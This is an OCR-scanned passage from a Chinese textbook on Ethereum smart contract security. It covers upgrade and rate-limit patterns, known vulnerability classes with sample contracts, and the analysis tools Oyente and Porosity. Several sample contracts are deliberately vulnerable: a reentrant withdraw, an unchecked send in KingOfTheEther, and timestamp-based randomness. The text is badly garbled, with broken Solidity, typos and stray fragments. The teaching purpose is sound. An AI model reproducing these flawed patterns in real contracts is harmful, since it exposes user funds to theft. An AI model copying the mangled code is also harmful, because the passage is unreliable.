previousBackends .push (backendContract); 
backendContract = newBackengd; 

return true; 

} 


return false; 




















这 种 方法 有 两 个 主要 的 缺点 。 
* 用 户 必须 始终 查找 当前 地 址 ， 否 则 任何 未 能 这 样 做 的 用 户 都 可 能 会 使 用 旧版 本 的 合约 。 
” 当 更 换 合约 时 ， 需 要 仔细 考虑 如 何 处 理 合约 数据 。 蔡 代 方法 是 将 合约 转发 和 数据 转换 为 最 新 版 本 的 合约 。 


案例 2: 使 用 DELEGATECALL 转 发 数据 和 调用 。 


contract Relay 


{ 
// 将 一 个 合约 转发 到 最 新 版 本 的 合约 上 
address public currentVersion; 
address public owner; 
modifier onlyOwner () 


{ 























if (msg.sender != owner) 





throw; 


} 


} 
function Relay(address initAddr) 
{ 








currentVersion = initAddr; 
owner = msg.sender; 


// 此 合约 的 所 有 者 可 能 是 具有 多 签名 的 另外 一 个 智能 合约 ， 而 不 是 一 个 单一 所 有 者 的 合约 






































} 


function changeContract (address newVersion) public 
onlyOwner () 


{ 





currentVersion = newVersion; 


// 合约 的 地 址 转换 到 新 的 地 址 ， 只 有 owner 才 可 以 调用 这 个 changeContract 的 函数 








} 


function () 





if(!IcurrentVersion.delegatecall (msg.data)) throw; 








这 种 方法 避免 了 以 前 的 问题 ,但 也 有 其 自身 的 问题 ， 即 必须 非常 小 心 如 何在 本 合约 中 存储 数据 。 如 果 新 合约 的 存储 布局 与 第 一 个 不 同 ， 则 数据 可 能 会 被 破坏 。 此 外 ， 这 种 简单 版 本 的 模式 不 能 从 函数 
返回 值 ， 只 能 转发 它们 ， 这 限制 了 其 适用 性 。 对 于 更 复杂 的 实现 ， 可 尝试 使 用 在 线 汇编 代码 和 返回 大 小 的 注册 表 来 解决 此 问题 。 


不 管 做 法 如 何 ， 重 要 的 是 要 有 一 些 方法 来 升级 合约 ， 否 则 当 发 现 不 可 避免 的 错误 时 ， 它 们 将 变 得 不 可 用 。 


19. 速 度 限制 (延迟 合约 行动 ) 


如 果 发 生 恶 意 行 为 ， 对 智能 合约 的 执行 进行 速度 限制 有 利于 我 们 争取 时 间 恢 复 。 例 如 ， 需 要 27 天 的 时 间 才 能 成 功 分 害 DAO， 这 在 某 种 程度 上 保证 了 资金 在 合约 中 增加 了 恢复 的 可 能 性 。 但 是 在 DAO 被 
攻击 的 情况 下 ， 没 有 其 他 有 效 的 函数 用 这 27 天 的 宝贵 时 间 来 对 付 黑客 。 如 果 把 这 里 介绍 的 速度 限制 与 上 面 介绍 过 的 紧急 停止 (Stoppable) 或 断路 器 结合 使 用 起 来 ， 则 DAO 的 资金 损失 就 变 得 非常 可 控 。 
例如 : 


struct RequestedWithdrawal 
{ 


uint amount; 
uint time; 





} 

mapping (address => uint) private balances; 
mapping (address => RequestedWithdrawal) 
private requestedWithdrawals; 








uint constant withdrawalWaitPeriod = 28 days; // 4 个 星期 
function requestWithdrawal() public 
{ 











If (balances[msg.sender] > 0) 


{ 





uint amountToWithdraw = balances [msg.senderl] 
palances[msg.sender] = 0; // 为 了 简化 ， 让 祷 报 提取 所 有 
// 假设 在 取款 过 程 中 deposit 凶 数 可 以 防止 新 的 deposit 
requestedWithdrawals[msg.sender] = RequestedWithdrawal 
({amount: amountToWithdraw,time: now}); 





长 
除 

















) 
} 
function withdraw() public 
{ 











if (requestedWithdrawals[msg.sender] .amount > 0 && now > 
requestedWithdrawals [msg.sender] .time + withdrawalWaitpPeriod) 


{ 








uint amountTowWithdraw = requestedWithdrawals [msg.sender] .amount; 
requestedWithdrawals [msg.sender] .amount = 0; 
if(!Imsg.sender.send(amountToWithdraw)) 


{ 
} 











throw; 


[ee 


0. 速 率 限制 


速率 (Rate) 限制 是 指 对 于 意义 重大 的 智能 合约 交易 行为 或 者 数据 改变 采取 合约 停止 执行 或 需要 某 种 特别 批准 。 例 如 ， 只 允许 存款 人 在 一 段 时 间 内 提取 一 定金 额 或 总 存款 的 一 定 百分比 (例如 ，1 天 内 
最 多 100 个 以 太 币 ) ， 该 时 间 段 内 的 额外 提 款 会 失败 或 需要 某 种 特别 批准 。 或 者 限 价 : 规定 在 合约 级 别 ， 合 约 期 限 内 只 能 发 出 一 定数 量 的 令 牌 。 


21. 断 言 防护 


当 断 言 (Assert) 失败 (例如 不 变 属性 更 改 ) 时 ， 断 言 保 护 将 触 友 。 例 如 ， 代 币 发行 合 约 中 的 代 币 到 以 太 币 的 发 行 比率 可 能 是 固定 的 ， 可 以 随时 用 断言 来 验证 是 否 是 这 种 情况 。 断 言 保护 应 经 常 与 其 
他 技术 相 结合 ， 例 如 和 暂停 合约 和 允许 升级 ， 否 则 可 能 会 被 卡 住 ， 总 是 有 失败 的 断言 。 如 果 以 太 币 与 总 代 币 数 的 比例 友 生 变化 ， 以 下 示例 将 恢复 交易 


contract TokenWithIinvariants 


{ 





mapping (address => uint) public balanceof; 
uint public totalSupply; 
modifier checkIinvariants 


{ 
} 


function deposit (uint amount) public checkInvariants 


{ 








~ 




















if (this.balance < totalSupply) throw; 











balanceof [msg.sender] += amount; 
totalSupply += amount; 
} 
function transfer (address to, uint value) public checkInvariants 


| 

















if (balanceof [msg.sender] >= value) 


{ 





balanceof [tol] += value; 
balanceof [msg.sender] -= value; 

















} 
} 
function withdraw() public checkIinvariants 


{ 














uint balance = balanceof [msg.sengderl]; 
if (msg.sender.call.value (balance) ()) 


{ 














totalSupply -= balance; 
balanceof [msg.sender]|] = 0; 











22. 合 约 推出 
在 大 量 资金 被 置 于 风险 之 前 ,合约 应 该 有 大 量 和 长 期 的 测试 期 ， 至 少 应 该 有 以 下 几 方 面 。 
. 有 一 个 完整 的 测试 套件 100% 地 测试 履 盖 (或 接近 它 ) 。 
. 在 自己 的 testnet 上 部 署 。 
` 在 公共 测试 网 上 部 署 大 量 测试 和 错误 奖励 。 
* 彻底 的 测试 应 允许 各 种 玩家 对 合约 进行 性 能 和 安全 的 测试 。 
` 在 主板 上 推出 Beta 版 本 时 ， 应 该 限制 智能 合约 的 资金 上 限 来 减少 
23. 自 动 淘汰 


在 测试 期 间 ， 可 以 在 一 段 时 间 后 阻止 任何 操作 ， 强 制 其 自动 废止 。 例 如 ， 在 Alpha 测 试 阶段 的 合约 可 能 会 工作 几 周 ， 然 后 自动 关闭 所 有 操作 。 只 容许 最 终 提取 剩余 的 资金 (withdraw) 。 





modifier isActive() 




















yy 
另 











if (block.number > SOMP BLOCK NUMBFE 
{ 


throw; 


} 








function deposit() public 
isActive() 


// 一 些 相关 的 代码 











function withdraw() public 
// 一 些 相关 的 代码 


3.2.3 ”智能 合约 的 几 个 安全 漏洞 


本 节 主 要 总 结 以 太 坊 智能 合约 的 安全 漏洞 。 这 些 安 全 漏洞 是 由 新 加 坡 国立 大 学 的 Loi Luu 等 人 提出 的 。 由 于 智能 合约 目前 尚 处 于 初级 阶段 ， 相 信 其 他 各 种 安全 问题 会 不 断 地 被 发 现 ， 所 以 我 们 需要 跟踪 
这 方面 的 信息 或 者 利用 专业 的 公司 来 帮助 评定 我 们 的 合约 在 新 的 环境 下 的 安全 问题 。 


1. 交 易 顺 序 依赖 合约 
交易 顺序 依赖 是 指 智能 合约 的 执行 随 着 当前 交易 处 理 的 顺序 不 同 而 产生 差异 。 例 如 ， 有 两 个 交易 Tl 和 T 有 ， 两 个 区 块 链 状 态 S[1] 和 S[2]， 在 处 理 完 交 易 T 中 后 S[1] 状 态 才 能 转化 为 状态 S[2]。 那 么 ， 如 


果 “ 矿 工 ” 先 处 理 交 易 T 中 ， 交 易 TH 调用 的 就 是 S[1] 状 态 下 的 智能 合约 ;如 果 “ 矿 工 ” 先 处 理 交 易 T 四 再 处 理 交 易 T 上 中， 那么 由 于 先 执行 的 是 T 中 ]， 合 约 状 态 就 转化 为 Sf2]， 最 终 交 易 T 中 执行 的 就 是 状态 S[2] 
时 的 智能 合约 。 


攻击 方法 举例 如 下 。 
如 下 面 的 智能 合约 ， 攻 击 者 提交 一 个 有 奖 竞猜 合约 ， 让 用 户 找 出 这 个 问题 的 解 ， 并 允诺 给 予 丰厚 的 奖励 。 攻 击 者 提交 完 合约 后 就 持续 监听 网 络 ， 如 果 有 人 提交 了 答案 的 解 ， 此 时 提交 答案 的 交易 还 未 
确认 ， 那 么 攻击 者 就 马上 发 起 一 个 交易 ， 降 低 奖金 的 数额 使 之 接近 于 0。 当 “矿工 ”处 理 这 两 个 交易 时 ， 当 前 交易 池 就 有 两 笔 竺 确认 交易 : 一 笔 交易 是 提交 答案 ,一 笔 交 易 是 更 改 奖 金 数 额 。 如 果 “ 矿 


DA = / 人 瑟 示 ]E 


工 ” 先 处 理 的 是 敌手 提供 的 更 改 奖 金 的 交易 ， 则 攻击 者 可 以 通过 增加 交易 费用 让 “矿工 ” 先 处 理 自己 的 交易 ， 那 么 等 到 “矿工 ”处 理 提交 答案 的 交易 时 ， 管 案 提 交 者 所 获得 的 奖励 将 变 得 极 低 ， 攻 击 者 就 
能 几乎 免费 的 获得 正确 答案 。 具 体 的 代码 如 下 (ownersend (reward) 和 reward=msg.value 两 条 语句 定义 在 fallback 函 数 中 ， 每 次 都 会 被 调用 到 ) 。 攻 击 者 部 署 这 个 合约 后 可 以 随时 调用 ， 最 终 达 到 攻 
击 的 目标 一 一 免费 获得 正确 答案 。 


contract Puzzle 

{ 
address public owner } 
bool public locked } 
uint public reward }; 
bytes32 public diff ， 
bytes public solution } 
// constructor 

function Puzzle () 


| 


























owner = msg . sender } 
reward = msg . value }; 
locked = false ， 

















diff = bytes32 (11111); // 预先 定义 的 困难 程度 
} 











function () 


{ 











// main 代码 ， 每 次 调用 都 会 自动 执行 


if ( msg . sender == Owner ) 


{ 


// 修改 奖品 的 资金 数量 
if ( locked ) 
throw } 
owner . send ( reward ) ， 
reward = msg . value } 
} 
else if ( msg . data . length > 0) 
{ 


// 提交 答案 

if ( locked ) throw ， 
if ( sha256 (msg . data ) < diff ) 
{ 





















































// 分 发 奖品 
msg . sender . send ( reward ); solution = msg . data ; 
locked = true }; 


} 


2. 时 间 惟 依赖 合约 
“矿工 ”处 理 一 个 新 的 区 块 时 ， 如 果 新 的 区 块 的 时 间 惟 大 于 上 一 个 区 块 ， 并 且 时 间 戳 之 差 小 于 900 秒 ， 那 么 这 个 新 区 块 的 时 间 戳 就 是 合法 的 。 这 是 以 太 坊 协议 所 规定 的 。 顾 名 思 义 ， 时 间 戳 依 束 就 是 指 
智能 合约 的 执行 依赖 于 当前 区 块 的 时 间 戳 ， 随 着 时 间 戳 的 不 同 ， 合 约 的 执行 结果 也 会 有 所 差别 。 


攻击 方法 举例 如 下 。 


有 一 个 抽奖 合约 ， 要 求 由 当前 的 时 间 截 和 其 他 可 提前 获知 的 变量 计算 出 一 个 “幸运 数 ”， 与 “幸运 数 ” 相 同 的 编码 的 参与 者 将 获得 奖品 。 那 么 “矿工 ”在 “ 挖 矿 ”过 程 中 可 以 提前 尝试 不 同 的 时 间 截 
来 计算 好 这 个 “幸运 数 ”， 从 而 将 奖品 送 给 自己 想 给 的 获奖 者 。 下 面 是 一 个 真实 的 智能 合约 的 简化 版 代码 。 这 个 合约 利用 区 块 的 时 间 戳 来 最 终 产 生 随 机 数 (uint256 salt=block.timestamp) ， 因 此 很 容 
易 受 到 攻击 。 


contract theRun 


{ 








uint private Last Payout = 0; 
uint256 salt = block . timestamp } 
function random returns ( uint256 result ) 








Uint256 y = salt * block . number /( salt $5); 
Uint256 seed = block . number /3 + ( salt %300)+ Last Payout +y; 
uint256 h = uint256 ( block . blockhash ( seed )); 


// 1 到 100 之 间 的 随机 数 














return uint256 (h %$ 100) + 1; 


3. 误 操作 异常 


在 以 太 坊 中 ， 一 个 合约 调用 另 一 个 合约 可 以 通过 send 指 令 或 直接 调用 另 一 个 合约 的 函数 来 完成 。 然 而 一 旦 在 调用 过 程 中 出 现 错误 ， 调 用 的 合约 就 会 回 退 到 之 前 的 状态 ， 而 这 个 异常 很 可 能 无 法 很 好 地 
被 调用 者 获知 (这 取决 于 调用 方式 ) 。 对 此 必须 采取 一 定 的 防范 措施 ， 才 能 免 受 攻击 。 例 如 ， 通 过 send 指 令 调 用 的 合约 应 该 通过 检查 返回 值 来 验证 合约 是 否 被 正确 执行 。 


攻击 方法 举例 如 下 。 
有 个 名 为 KingOfTheEtherThrone (KoET) 的 智能 合约 : 用 户 可 以 通过 一 定数 量 的 以 太 币 成 为 “以 太 币 国王 ”， 支 付 的 数额 由 现任 国王 决定 。 很 显然 ， 当 前 国王 可 以 通过 买卖 王座 获得 利润 。 当 一 个 


用 户 声 称 为 国王 后 ， 合 约 就 发 送 赔偿 金 给 现任 国王 ， 并 指定 这 个 用 户 为 新 的 国王 。 然 而 ， 这 个 合约 并 没有 检查 支付 赔偿 金 的 交易 的 结果 。 这 样 一 旦 合约 在 执行 过 程 中 产生 了 异常， 现任 国王 就 有 可 能 同时 
失去 王座 和 赔偿 金 。 可 能 的 攻击 方式 就 是 攻击 者 故意 超出 调用 栈 的 大 小 限制 。 以 太 坊 虚拟 机 规定 调用 栈 的 深度 为 1024。 攻 击 者 在 攻击 之 前 ， 首 先 调 用 自身 1023 次 ， 然 后 发 送 交 易 给 KoET 合 约 ， 这 样 就 造 


成 了 合约 的 调用 栈 超 出 了 限制 ， 从 而 出 现 了 错误 。 合 约 出 错 后 ， 因 为 这 个 合约 没有 检查 返回 值 ， 那 么 如 果 合 约 在 发 送 赔偿 金 给 现任 国王 的 过 程 中 出 现 了 异常 ， 那 么 现任 国王 就 极 有 可 能 失去 王座 和 赔偿 
金 。 下 面 是 这 个 合约 的 简化 版 代码 (在 以 太 坊 上 确实 有 过 这 样 的 合约 ) ， 其 中 currentMonarch.ethAddrsend (compensation) 没有 检查 函数 调用 的 结果 。 如 果 调 用 出 了 错 ， 下 面 的 代码 无 法 执行 ， 
王 就 失去 了 王座 和 赔偿 金 。 











contract KinoofTheEtherThrone 
{ 
struct Monarch 


{ 
// 国王 的 地 址 
address ethAddr ， 
string name } 
// 他 文 付 给 国王 的 金额 
uint claimPrice ， 
uint coronationTimestamp }) 





























} 

Monarch public currentMonarch } 

// 认领 王位 

function claimThrone ( string name ) 


{ 
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If ( currentMonarch . ethAgddr != wizardAgddress ) 
currentMonarch . ethAgddr . send ( compensation ); 
// 检查 结果 




















/http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/17613/0EBPS/Text/.../ 

// 分 配 新 的 国 3 

currentMonarch = Monarch ( msg . sender , name , valuePaid , block .time 
stamp ); 








Ly 





4. 可 重 入 攻击 
在 以 太 坊 中 ， 当 一 个 合约 调用 另 一 个 合约 的 时 候 ， 当 前 的 操作 就 要 等 到 调用 结束 之 后 才 会 继续 。 这 时 ， 如 果 被 调用 者 需要 使 用 调用 者 当前 所 处 的 状态 ， 就 产生 了 问题 。 著 名 的 DAO 攻 击 事件 就 是 因为 
这 个 漏洞 而 发 生 的 。 


需要 注意 的 是 ， 由 于 智能 合约 处 在 不 断 发 展 、 成 熟 的 过 程 中 ， 我们 可 能 永远 做 不 到 把 所 有 的 安全 漏洞 都 罗列 出 来 ， 只 能 在 此 介绍 一 些 比较 典型 的 漏洞 。 下 面 提 到 的 工具 和 开发 框架 可 以 为 我 们 提供 一 
定 的 帮助 。 


3.2.4 ”智能 合约 安全 的 开源 工具 


1. 开 源 安全 智能 合约 框架 : Zeppelin 


Zeppelin 是 一 个 社区 驱动 项 目 ， 目 的 在 于 实现 安全 的 、 经 测试 的 且 经 审计 的 智能 合约 代码 开发 。 鉴 于 以 太 坊 是 最 广 为 使 用 的 智能 合约 开发 平台 ，Zeppelin 项 目 在 初期 主要 侧重 于 为 Solidity 语 言 构 建 工 
具 。 目 前 Zeppline 提 供 了 如 下 的 安全 模块 。 


1) 拉动 式 支付 (Pull Payment) 辅助 模块 : 采用 拉动 式 支 付 (命名 源 于 其 工作 方式 与 需要 发 送 操作 的 推动 式 支付 相反 ) 策略 可 避免 许多 的 安全 问题 (包括 臭名 昭著 的 “DAO 被 破解 ”事件 ) 。 现 在 
已 经 上 县 有 了 简易 的 PullPaymentCapable.sol 合 约 ， 但 是 仍 需 要 更 全 面 的 工具 、 文 档 和 实例 。 


2) 合约 生命 周期 工具 : 当前 在 没有 过 多 考虑 未 来 将 会 发 生 什 么 的 情况 下 ， 大 部 分 的 合约 就 被 部 署 到 区 块 链 中 。 我 们 需要 构建 能 更 好 地 去 管理 合约 终结 策略 、 合 约 属 主 转 变 、 合 约 暂 停 及 恢复 、 合 约 升 
级 等 的 工具 。 


3) 容错 和 自动 挑 错 奖励 : 其 中 包括 对 漏洞 的 自动 检测 、 从 不 一 致 状态 恢复 的 工具 、 限 定 合约 所 管理 资金 规模 的 简易 工具 。 我 们 也 在 致力 于 研发 漏洞 奖励 合约 ， 并 期 望 不 断 改进 该 合约 ， 以 实现 自动 向 
可 攻破 我 们 合约 固定 部 分 的 安全 研究 者 支付 酬劳 。 


4) 可 重用 的 基础 组 件 : 对 于 每 个 新 的 项 目 ， 其 中 的 一 些 通 用 模块 依然 需要 从 零 开 发 ， 重 新 实现 。 我 们 希望 能 为 代 币 发 行 、 众 筹 、 表 决 、 投 注 、 工 资 单 、 收 益 共享 等 构建 标准 的 合约 。 


5) 探究 形式 验证 理念 : 合约 的 形式 验证 是 一 个 活跃 的 研究 领域 ， 将 其 研究 工作 成 果 集成 到 Zeppelin 中 ， 可 为 合约 提供 有 效 的 安全 保障 。 形 式 验证 意味 着 对 合约 代码 进行 静态 分 析 ， 从 形式 上 验证 合约 
的 正确 性 以 及 存在 的 问题 。 


6) 与 Oracle 更 好 的 接口 : 如 何 与 离 区 块 链 数 据 源 进行 交互 是 智能 合约 发 展 中 的 一 个 重要 部 分 。 其 中 一 个 值得 去 探究 的 有 意思 的 想法 就 是 做 反 向 控制 。 这 种 方式 中 ，Oracle 通 过 通用 接口 方法 调用 合约 
(用 于 在 Truth 外 进行 通信 ) ， 并 按 所 需 去 实现 Oracle 逻 辑 ， 其 中 包括 了 值得 信赖 的 专家 、 关 闭 的 投票 、 开 放 投 票 、APl 包 装 器 等 。 这 样 并 非 是 合约 从 Oracle 请 求 数据 ， 而 是 在 数据 发 生 了 改变 时 由 Oracle 
去 通知 合约 。 


7) 更 好 的 重用 代码 工具 : 当前 Solidity 的 代码 重用 是 基于 备份 复制 的 ,或 从 其 他 的 代码 库 下 载 已 有 的 代码 。 一 个 成 熟 的 生态 系统 应 具有 良好 的 代码 库 管理 系统 ， 就 像 Node.js 的 NPM 和 Ruby 的 Gems 
那样 。 


这 些 功能 模块 的 设计 都 是 基于 通用 合约 安全 模式 的 。Zeppelin 是 与 以 太 坊 开发 者 所 使 用 的 首要 构建 架构 Truff le 相 集 成 的 。 先 期 采用 者 可 在 Zeppelin 开 发 者 协作 群 组 (slack Channel) 上 提问 并 追踪 
进度 ， 也 可 在 BlockParty 项 目 中 学 习 如 何 使 用 Zeppelin。 首 个 公共 发 布 版 本 计划 在 2017 年 11 月 发 布 ， 该 发 布 将 伴 以 基于 Zeppelin 构 建 的 真正 的 DAO 项 目 。 


2. 智 能 合约 安全 分 析 工 具 : Oyente 


该 工具 可 与 任何 基于 以 太 坊 的 EDCC 语 言 兼 容 ， 包 括 Soldity、Serpent 和 LLL。Oyente 最 初 由 新 加 坡 国 立 大 学 博士 生 Loi Luu 在 其 学 术 论 文中 发 表 。 在 研发 资金 耗 尽 之 后 ，Oyente 项 目 被 搁置 至 2017 年 
2 月 。 后 来 Melonport 筹 集 了 250 万 瑞士 法 妇 ， 开 始 对 该 项 目 进行 研发 。 根 据 Melonport 的 说 法 ，Oyente 有 可 能 “大 大 增强 以 太 坊 开发 者 社区 创建 安全 、 可 靠 的 分 散 式 应 用 程序 的 能 力 ”。 这 也 促使 它们 
与 Oyente 的 开发 者 达成 合作 ， 共 同 开发 该 项 目 。 经 过 6 个 月 的 工作 ，Oyente 覆 盖 了 大 量 的 以 太 虚 拟 机 (EVM) 操作 码 。 


该 工具 可 供 不 同类 型 的 用 户 使 用 。 


对 于 非 技术 型 用 户 ， 可 以 使 用 Oyente 来 分 析 别 人 开发 的 智能 合约 。 例 如 ， 现 在 很 多 ICO 的 代 币 发 行 都 是 用 智能 合约 。 如 果 我 们 参与 ICO， 但 是 不 知道 ICO 对 应 的 智能 合约 是 否 安全 ， 便 可 以 利用 
Oyente 来 获知 是 否 有 任何 潜在 的 错误 以 及 可 能 会 导致 的 问题 。 虽 然 该 工具 无 法 做 到 百分之百 的 正确 ， 也 不 能 保证 最 终 的 安全 ， 但 是 我 们 可 以 把 它 作为 第 一 道 安 全 防线 来 检查 要 用 到 的 智能 合约 。 配 合 这 本 
书 提 到 的 其 他 措施 ， 可 以 尽量 提高 安全 性 。 


对 于 智能 合约 的 开发 人 员 来 说 ，Oyente 当 然 也 是 非常 有 用 的 。 有 一 个 工具 来 检查 你 的 代码 总 是 很 有 帮助 的 ， 特 别 是 当 我 们 刚刚 开始 编程 智能 合约 的 。 开 发 人 员 还 可 以 使 用 Oyente 来 开发 新 的 检测 模 
块 ， 用 来 检查 智能 合约 的 特定 Bug 或 者 特定 的 安全 属性 。 这 对 任何 设计 智能 合约 的 人 都 有 深远 的 影响 。 它 允许 检查 某 些 通常 不 被 视 为 Bug 但 在 智能 合约 的 环境 下 是 一 个 安全 漏洞 的 场景 。 例 如 传统 编程 中 ， 
外 部 函数 的 调用 不 是 一 个 Bug， 但 是 在 智能 合约 中 外 部 函数 的 调用 可 以 看 成 是 一 个 安全 漏洞 。Oyente 可 以 用 来 检测 这 样 的 漏洞 。 


Oyente 的 另 一 个 用 途 是 为 高 覆盖 率 的 智能 合约 生成 测试 用 例 。Oyente 中 的 执行 路 径 探索 模块 允许 我 们 访问 所 有 可 能 的 路 径 ， 并 生成 相应 的 输入 ， 从 而 推动 合约 执行 到 这 些 路 径 。 可 以 运行 生成 的 输 
入 并 检查 输出 是 否 与 预期 的 一 样 ， 以 验证 其 实现 的 正确 性 。 


需要 注意 的 是 ， 该 工具 尚未 成 熟 ， 我 们 不 能 仅仅 依靠 它 来 保证 智能 合约 的 安全 。 
3. 以 太 坊 的 开源 EVM 反 编译 软件 Porosity 


2017 年 7 月 ， 在 美国 拉 斯 维 加 斯 举办 的 DefCon 黑 客 大 会 上 ， 网 络 安全 创业 公司 Comae Technologies 正 式 公布 了 这 款 反 编译 软件 。 使 用 该 开源 EVM 反 编译 软件 ， 可 以 更 容易 地 识别 以 太 坊 智能 合约 中 
的 安全 漏洞 ， 能 够 让 开发 者 恢复 难以 理解 的 EVM 字 节 码 到 初始 状态 。 


Porosity 的 开发 者 和 Comae 的 创始 人 Matt Suiche 曾 这 样 描述 编写 反 编译 软件 的 初 袁 : “我 编写 反 编译 软件 ， 最 初 想 要 解决 的 问题 就 是 希望 能 够 获得 真实 的 源 代码 ， 并 且 无 须 通过 逆向 工程 就 能 获得 
真正 的 源 代码 。" 


此 外 ，Porosity 还 整合 了 摩根 大 通 的 开源 企业 级 Quorum 区 块 链 ， 目 前 已 经 可 以 从 该 银行 的 GitHub 中 获取 。 经 过 协同 测试 ， 它 们 预计 Porosity 和 Quorum 可 为 运行 实时 智能 合约 安全 检查 提供 极 大 的 
便利 。 这 次 结合 直接 整合 到 了 Go 语言 以 太 坊 实现 版 本 geth， 结 合 了 私有 网络 安 全 性 和 修补 流程 与 正式 的 治理 模式 。 


消费 者 软件 提供 商 和 网 络 安 全 性 咨询 公司 ITBS 首 席 执行 官 Alex Rass 表 示 ， 因 为 智能 合约 在 被 实施 后 被 频繁 友 现 漏洞 ，EVM 反 编译 软件 能 够 让 投资 者 放下 心 来 。 根 据 Rass 所 说 ， 反 编译 软件 在 大 多 
数 “ 大 型 ”编程 语言 中 都 很 常见 ， 其 中 很 重要 的 一 个 原因 就 是 反 编译 软件 能 够 为 投资 者 提供 保障 ， 保 证 他 们 正在 投资 的 东西 就 是 正在 被 使 用 的 。 


有 关 Porosity 的 具体 内 容 ， 参 见 https://github.com/EthereumEx/porosity。 下 面 列举 一 些 比较 常用 的 Porosity 命 令 的 使 用 方法 。 


1) 列表 选项 --list: 从 调度 例 程 中 获取 所 有 函数 的 列表 。 








PS E:\defcon2017> & S$porosity --code $code --abi S$abi --list --verbose 0 





2) --disassm 选 项 : 显示 程序 的 汇编 代码 。 











PS E:\defcon2017> & S$porosity --abi S$abi --codqe S$code --disassmPorosity v0.1 (https: 
// www.comae.io)Matt Suiche, Comae Technologies <support@comae.io>The Ethereum 
bytecode commandline decompiler.Decompiles thegivenEthereum inputbytecode 
and outputs the Solidity code. 














3) 反 编 译 选 项 -decompile: 可 以 对 给 定 的 函数 或 合约 进行 反 编 译 ， 并 尝试 突出 显示 漏洞 。 











PS E:\defcon2017> & S$porosity --abi S$abi --code $code --decompile --verbose0 
Porosity vO.1 (https:// www.comae.io)Matt Suiche, Comae Technologies<support@ 
comae.io>The Ethereum bytecode commandline decompiler.Decompiles the given 

Ethereum input bytecode and outputs the Solidity code.Attempting to parse 

ABIdefinitionhttp://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/17613/0EBPS/Text/...Success.Hash: Ox5FD8C710functionwithdrawBalance () 







































































If (msg.sender.call.gas (4369) .value (store[msg.sender]) ()) 


store[msg.sender] = 0x0;// 有 重新 进入 的 漏洞 
} 





3.2.5 ”智能 合约 的 形式 化 验证 


形式 化 验证 是 用 一 个 自动 的 数学 证 明 来 验证 源 代码 实现 了 某 种 形式 的 规范 (Specif ication) 。 以 太 坊 的 高 级 编程 语言 Solidity 的 主导 开发 者 Christian Reitwiessner 正 在 将 形式 化 证 明 引 擎 Why3 整 合 
到 Solidity 中 ， 让 用 户 可 以 在 Solidity 程 序 中 插入 与 某 种 数学 论点 有 关 的 证 据 ， 并 在 编译 的 时 候 进 行 验证 。 此 外 ， 还 有 一 个 项 目 在 将 形式 化 证 明 技术 Imandra 整 合 到 以 太 坊 虚拟 机 的 代码 里 。 


Hyperledger Fabric 正 在 进行 一 项 名 为 Composer 的 项 目 。 这 个 项 目 可 以 使 得 开 友 人 员 用 模型 语言 (Modelling Language) 编写 应 用 的 需求 ，Composer 可 以 把 需求 自动 生成 智能 合约 。Composer 
的 形式 化 验证 工具 将 按照 模型 语言 产生 的 智能 合约 进行 分 析 。 如 果 是 正确 的 ， 工 具 会 给 出 肯定 的 判断 ;如果 不 正确 ， 工 具 会 输出 一 个 反例 ， 解 释 为 什么 智能 合约 不 符合 需求 的 规范 。 这 个 工具 现在 还 没 
有 ， 但 是 做 出 来 以 后 对 Hyperledger Fabric 的 开发 者 在 安全 方面 少 犯 错误 会 有 很 大 的 帮助 。 


形式 化 验证 在 一 定 程 度 上 能 够 保护 智能 合约 的 安全 。 比 如 ，The DAO 安 全 问题 在 发 生 以 前 曾经 由 一 些 安全 专家 对 代码 进行 审核 ， 但 是 在 项 目 众 筹 (1CO) 以 前 没有 发 现 安 全 问题 ， 后 来 一 个 不 知名 的 
黑客 利用 智能 合约 的 漏洞 偷 走 了 相当 于 7 干 万 美金 的 代 币 。 这 次 事件 的 后 果 是 The DAO 项 目 破 产 ， 以 太 坊 币 的 分 又 。 如 果 使 用 形式 化 验证 ， 智 能 合约 的 漏洞 就 可 以 被 发 现 。 需 要 注意 的 是 ， 形 式 化 验证 本 
身 只 能 帮助 我 们 了 解 我 们 设计 的 规范 和 区 块 链 智 能 合约 的 操作 (实际 实现 ) 之 间 的 区 别 。 我 们 仍然 需要 检查 规范 是 否 是 我 们 想 要 的 ， 这 个 形式 化 证 明 是 帮 不 上 忙 的 。 我 们 需要 在 整个 智能 合约 的 开发 过 程 
中 ， 包 括 需求 收集 过 程 中 考虑 安全 的 问题 。 


3.2.6 ”智能 合约 的 虚拟 机 安全 


虚拟 机 (VM) 是 安装 在 软件 上 的 操作 系统 (OS) 或 应 用 程序 环境 ， 可 以 模仿 专用 硬件 。 最 终 用 户 在 虚拟 机 上 具有 与 专用 硬件 上 相同 的 体验 。 有 些 虚拟 机 提供 比较 完整 的 操作 系统 (OS) ， 比 如 
VMware、Hyper-V、Oracle VirtualBox 等 ， 可 以 在 这 些 虚拟 机 上 安装 操作 系统 和 应 用 程序 ; 另 一 些 虚 拟 机 则 只 提供 应 用 程序 环境 ， 例 如 Java 虚 拟 机 。 区 块 链 智 能 合约 系统 的 设计 中 ， 很 少 会 采用 模拟 完 
整 操作 系统 的 模式 ， 因 为 这 种 模式 会 消耗 大 量 的 资源 并 严重 影响 性 能 ， 且 很 难 兼 容 不 同 的 操作 系统 架构 。 因 此 ， 绝 大 多 数 的 区 块 链 会 采用 更 加 轻 量 级 的 虚拟 机 架构 。 例 如 ， 以 太 坊 开发 了 EVM，R3 Corda 
则 直接 采用 了 JVM， 还 有 一 些 区 块 链 (比如 LISK) ) 采用 了 V8 引 擎 一 一 Google 的 Javascript 引 警 (虚拟 机 ) 。 





1. 以 太 坊 虚拟 机 的 安全 设计 
以 太 坊 提出 了 下 面 的 虚拟 机 设计 原理 ， 对 虚拟 机 安全 有 很 好 的 借鉴 作用 。 
` 简单 性 : 尽 可 能 少 、 尽 可 能 底层 的 操作 码 (opcodes) ， 尽 可 能 少 的 数据 类 型 ， 尽 可 能 少 的 虚拟 机 层次 结构 。 


. 完全 确定 性 : VM 规 范 的 任何 部 分 绝对 不 存在 歧义 ， 结 果 应 该 是 完全 确定 的 。 此 外 ， 应 该 有 一 个 精确 的 计算 步骤 概念 用 来 计算 Gas 的 消耗 。 


. 空间 节省 : EVM 组 件 应 尽 可 能 紧凑 (例如 ，C 程 序 默认 的 4000 基 础 字 节 是 不 可 接受 的 ) 。 

